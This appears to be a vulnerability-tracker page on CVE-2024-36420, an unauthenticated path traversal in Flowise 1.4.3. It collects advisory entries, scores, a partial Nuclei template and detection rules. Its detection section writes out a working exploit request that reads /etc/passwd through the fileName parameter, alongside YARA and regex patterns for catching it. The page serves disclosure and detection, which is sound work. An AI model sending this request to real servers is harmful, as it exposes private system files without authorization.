CVE-2024-36420
published 2024-07-01CVE-2024-36420: Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, the `/api/v1/openai-assistants-file`…
PriorityP354high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
1.76%
75.2th percentile
Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, the `/api/v1/openai-assistants-file` endpoint in `index.ts` is vulnerable to arbitrary file read due to lack of sanitization of the `fileName` body parameter. No known patches for this issue are available.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flowiseai | flowise | <= 1.4.3 | — |
| flowiseai | flowise | — | — |
| flowiseai | flowise | 0 – 1.4.3 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /api/v1/openai-assistants-file HTTP/1.1
Content-Type: application/json
{"fileName":"../../../../etc/passwd"}
yara
rule CVE_2024_36420_Flowise_LFI { strings: $req = "/api/v1/openai-assistants-file" $traversal = "../../../../etc/passwd" condition: $req and $traversal }- →Detect POST requests to /api/v1/openai-assistants-file containing path traversal sequences (e.g., '../') in the 'fileName' JSON body parameter
- →Successful exploitation returns HTTP 200 with response body matching Unix /etc/passwd format (root:*:0:0:) and a response header containing 'attachment; filename=passwd'
- →Match response body for passwd file patterns: lines beginning with 'root:[^:]*:0:0:' or 'daemon:[^:]*:[0-9]+:[0-9]+:' to confirm successful arbitrary file read
- ·No known patches are available for this vulnerability in Flowise 1.4.3; the endpoint is unauthenticated (unauth tag), meaning no credentials are required to exploit it ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Flowise Path Injection at /api/v1/openai-assistants-file
osv·2024-08-05
CVE-2024-36420 [HIGH] Flowise Path Injection at /api/v1/openai-assistants-file
Flowise Path Injection at /api/v1/openai-assistants-file
Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, the `/api/v1/openai-assistants-file` endpoint in `index.ts` is vulnerable to arbitrary file read due to lack of sanitization of the `fileName` body parameter. No known patches for this issue are available.
GHSA
Flowise Path Injection at /api/v1/openai-assistants-file
ghsa·2024-08-05
CVE-2024-36420 [HIGH] CWE-74 Flowise Path Injection at /api/v1/openai-assistants-file
Flowise Path Injection at /api/v1/openai-assistants-file
Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, the `/api/v1/openai-assistants-file` endpoint in `index.ts` is vulnerable to arbitrary file read due to lack of sanitization of the `fileName` body parameter. No known patches for this issue are available.
No detection rules found.
Nuclei
Flowise 1.4.3 - Arbitrary File Read
nuclei·CVSS 7.5
CVE-2024-36420 [HIGH] Flowise 1.4.3 - Arbitrary File Read
Flowise 1.4.3 - Arbitrary File Read
Flowise 1.4.3 contains a path traversal caused by lack of sanitization of 'fileName' parameter in /api/v1/openai-assistants-file endpoint in index.ts, letting attackers read arbitrary files, exploit requires attacker to send crafted request.
Template:
id: CVE-2024-36420
info:
name: Flowise 1.4.3 - Arbitrary File Read
author: fineman999
severity: high
description: |
Flowise 1.4.3 contains a path traversal caused by lack of sanitization of 'fileName' parameter in /api/v1/openai-assistants-file endpoint in index.ts, letting attackers read arbitrary files, exploit requires attacker to send crafted request.
impact: |
Attackers can read arbitrary files on the server, potentially exposing sensitive information.
remediation: |
No known patches available; con
No writeups or analysis indexed.
https://github.com/FlowiseAI/Flowise/blob/e93ce07851cdc0fcde12374f301b8070f2043687/packages/server/src/index.ts#L982https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/https://github.com/FlowiseAI/Flowise/blob/e93ce07851cdc0fcde12374f301b8070f2043687/packages/server/src/index.ts#L982https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/
2024-07-01
Published